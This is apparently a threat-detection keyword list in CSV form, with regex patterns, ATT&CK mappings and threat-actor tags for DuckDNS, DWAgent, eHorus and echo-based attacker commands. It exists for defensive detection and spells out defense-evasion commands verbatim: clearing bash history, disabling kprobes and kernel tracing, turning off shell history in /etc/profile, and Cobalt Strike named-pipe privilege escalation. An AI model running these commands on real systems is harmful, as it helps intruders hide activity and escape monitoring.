"*/duckdns/duck.log*",".{0,1000}\/duckdns\/duck\.log.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*/duckdns/duck.sh*",".{0,1000}\/duckdns\/duck\.sh.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*/duckdns-powershell.git*",".{0,1000}\/duckdns\-powershell\.git.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*/opt/duckdns/*",".{0,1000}\/opt\/duckdns\/.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\DuckDNS.cfg*",".{0,1000}\\DuckDNS\.cfg.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\DuckDNS.csproj*",".{0,1000}\\DuckDNS\.csproj.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\DuckDNS.exe*",".{0,1000}\\DuckDNS\.exe.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\DuckDNS.lnk*",".{0,1000}\\DuckDNS\.lnk.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\DuckDNS.sln*",".{0,1000}\\DuckDNS\.sln.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*\Update-DuckDNS.ps1*",".{0,1000}\\Update\-DuckDNS\.ps1.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*4B9C98F6-AF30-4280-873D-B45C7A7B89EB*",".{0,1000}4B9C98F6\-AF30\-4280\-873D\-B45C7A7B89EB.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","#GUIDproject","N/A","5","10","N/A","N/A","N/A","N/A"
"*8a35136501dde420ec5f3e88a7906c8c3d63af06621b47513befe8f09db3ed04*",".{0,1000}8a35136501dde420ec5f3e88a7906c8c3d63af06621b47513befe8f09db3ed04.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","#filehash","N/A","5","10","N/A","N/A","N/A","N/A"
"*ataylor32/duckdns-powershell*",".{0,1000}ataylor32\/duckdns\-powershell.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*chmod 700 duck.sh*",".{0,1000}chmod\s700\sduck\.sh.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*https://www.duckdns.org/update?domains=*",".{0,1000}https\:\/\/www\.duckdns\.org\/update\?domains\=.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*jzelinskie/duckdns*",".{0,1000}jzelinskie\/duckdns.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*Sending update request to Duck DNS*",".{0,1000}Sending\supdate\srequest\sto\sDuck\sDNS.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*XWolfOverride/DuckDNS*",".{0,1000}XWolfOverride\/DuckDNS.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*",".{0,1000}\-\-headless\s\-\-disable\-gpu\s\-\-disable\-logging\s\-\-dump\-dom\shttps\:\/\/getip\.pro.{0,1000}","greyware_tool_keyword","ducktail","infostealer command to retrieve public ip address","T1596 - T1590.005","TA0043 - TA0007 - TA0009","Ducktail ","N/A","Reconnaissance","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/dwagent.desktop*",".{0,1000}\/dwagent\.desktop.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*/dwagent.service*",".{0,1000}\/dwagent\.service.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*/dwagsystray*",".{0,1000}\/dwagsystray.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\.dwagent\*",".{0,1000}\\\.dwagent\\.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\AppData\Local\Temp\dwagent*",".{0,1000}\\AppData\\Local\\Temp\\dwagent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\CurrentVersion\Run\DWAgentMon*",".{0,1000}\\CurrentVersion\\Run\\DWAgentMon.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagent.exe*",".{0,1000}\\dwagent\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\DWAgent.lnk*",".{0,1000}\\DWAgent\.lnk.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagent.log*",".{0,1000}\\dwagent\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagent.pid*",".{0,1000}\\dwagent\.pid.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagent.start*",".{0,1000}\\dwagent\.start.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagent.stop*",".{0,1000}\\dwagent\.stop.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwaggdi.dll*",".{0,1000}\\dwaggdi\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwaginstall.log*",".{0,1000}\\dwaginstall\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwaglnc.exe*",".{0,1000}\\dwaglnc\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagsvc.exe*",".{0,1000}\\dwagsvc\.exe.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\dwagupd.dll*",".{0,1000}\\dwagupd\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\Services\DWAgent*",".{0,1000}\\Services\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*\Start Menu\Programs\DWAgent*",".{0,1000}\\Start\sMenu\\Programs\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*>DWAgent<*",".{0,1000}\>DWAgent\<.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*015774ac49fa929ca39c0707aa8177e4605b7df9f53d8630fea1ef5155bb5328*",".{0,1000}015774ac49fa929ca39c0707aa8177e4605b7df9f53d8630fea1ef5155bb5328.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*1429e62855ce5572b735fe0460ffa6a8f26d56199a8e166152252c7bd659d275*",".{0,1000}1429e62855ce5572b735fe0460ffa6a8f26d56199a8e166152252c7bd659d275.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*3241d780f32a6a89d3b3f30d85f21f33f9d4d91227d129b2fd81d75baa870337*",".{0,1000}3241d780f32a6a89d3b3f30d85f21f33f9d4d91227d129b2fd81d75baa870337.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*36a7532a957652a55dbf0b196905652a1f0b8c4019b7ca4e749fa81e5f2c149b*",".{0,1000}36a7532a957652a55dbf0b196905652a1f0b8c4019b7ca4e749fa81e5f2c149b.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*4f21a1d0e7caa97018e4d0b8c7e63fbc54d081976dfda9409f57a3ead24074a7*",".{0,1000}4f21a1d0e7caa97018e4d0b8c7e63fbc54d081976dfda9409f57a3ead24074a7.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*cd12e8a285c77102487f04726b91bc649f9ad087a1e9a5546124a0cc7480c221*",".{0,1000}cd12e8a285c77102487f04726b91bc649f9ad087a1e9a5546124a0cc7480c221.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*d2b2455b755476d0b35c721ccdb84432e51812ab646a9210137c1e85b90d7de4*",".{0,1000}d2b2455b755476d0b35c721ccdb84432e51812ab646a9210137c1e85b90d7de4.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","#filehash","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwagent_install.log*",".{0,1000}dwagent_install\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwagent_unistall.log*",".{0,1000}dwagent_unistall\.log.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwaggdi_x86_32.dll*",".{0,1000}dwaggdi_x86_32\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwaggdi_x86_64.dll*",".{0,1000}dwaggdi_x86_64\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwagscreencapture.dll*",".{0,1000}dwagscreencapture\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwagscreencapturebitblt.dll*",".{0,1000}dwagscreencapturebitblt\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwagscreencapturedesktopduplication.dll*",".{0,1000}dwagscreencapturedesktopduplication\.dll.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*dwservice/agent*",".{0,1000}dwservice\/agent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*Program Files\DWAgent*",".{0,1000}Program\sFiles\\DWAgent.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","0","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*www.dwservice.net*",".{0,1000}www\.dwservice\.net.{0,1000}","greyware_tool_keyword","dwagent","The DWService to remotly control your machine - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/dwservice/agent","1","1","N/A","N/A","10","5","426","81","2023-03-22T08:45:16Z","2019-01-23T10:40:24Z"
"*nabbmpekekjknlbkgpodfndbodhijjem*",".{0,1000}nabbmpekekjknlbkgpodfndbodhijjem.{0,1000}","greyware_tool_keyword","Earth VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*%COMSPEC%*echo*\pipe\*",".{0,1000}\%COMSPEC\%.{0,1000}echo.{0,1000}\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*cmd*echo*\pipe\*",".{0,1000}cmd.{0,1000}echo.{0,1000}\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*cmd.exe  /S /D /c* echo 123",".{0,1000}cmd\.exe\s\s\/S\s\/D\s\/c.{0,1000}\secho\s123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*cmd.exe /c echo %username%*",".{0,1000}cmd\.exe\s\/c\secho\s\%username\%.{0,1000}","greyware_tool_keyword","echo","alternative to whoami","T1033","TA0007 ","N/A","N/A","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A"
"*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","echo","potential malleable Cobalt Strike profiles behavior","T1559 - T1134.001","TA0008 - TA0011","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","135","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
"*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*echo '' > ~/.bash_history*",".{0,1000}echo\s\'\'\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","echo","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*echo 0 > /sys/kernel/debug/kprobes/enabled*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/kprobes\/enabled.{0,1000}","greyware_tool_keyword","echo","This command disables kprobes by writing '0' to the enabled file. Kprobes are dynamic breakpoints in the Linux kernel that can be used to intercept functions and gather information for debugging or monitoring.","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo 0 > /sys/kernel/debug/tracing/instances/$*/tracing_on*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/tracing\/instances\/\$.{0,1000}\/tracing_on.{0,1000}","greyware_tool_keyword","echo","This command turns off tracing for a specific instance","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo 'set +o history' >> /etc/profile*",".{0,1000}echo\s\'set\s\+o\shistory\'\s\>\>\s\/etc\/profile.{0,1000}","greyware_tool_keyword","echo","linux command abused by attacker","T1146 - T1059.004 - T1556.003","TA0005 - TA0009 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*""appName"":""eHorus Agent""*",".{0,1000}\""appName\""\:\""eHorus\sAgent\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*$EHORUS_HOME/.vnc/passwd*",".{0,1000}\$EHORUS_HOME\/\.vnc\/passwd.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ehorus_agent_installer-*",".{0,1000}\/ehorus_agent_installer\-.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
